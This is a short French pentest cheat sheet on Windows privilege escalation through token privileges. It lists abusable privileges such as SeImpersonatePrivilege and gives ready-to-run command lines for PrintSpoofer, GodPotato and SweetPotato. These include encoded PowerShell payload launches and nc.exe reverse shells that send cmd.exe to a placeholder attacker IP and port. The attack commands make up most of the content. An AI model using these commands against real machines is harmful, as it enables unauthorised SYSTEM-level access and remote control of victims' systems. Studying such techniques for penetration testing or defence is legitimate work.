Privilege Windows

Plusieurs tokens d’accès pouvant mener à une élévation de privilège:

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

Ressources:

SeImpersonatePrivilege

Plusieurs outils permettent d’exploiter ce privilège

.\printspoofer.exe -i -c "powershell -noP -sta -w 1 -enc <payload>

Github: https://github.com/itm4n/PrintSpoofer

Godpotato est l’une des “patates” permettant d’abuser de ce privilège. L’intérêt de celui-ci c’est qu’il compile les techniques de plusieurs autres (RottenPotato, JuicyPotato, etc.)

.\GodPotato-NET4.exe -cmd "powershell -e <payload>"
.\GodPotato-NET4. -cmd "c:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $ATTACKER_IP $ATTACKER_PORT"

Une autre alternative à surveiller: https://github.com/lypd0/DeadPotato/

# Todo: voir si le powershell est vraiment nécessaire
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "c:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $ATTACKER_IP $ATTACKER_PORT"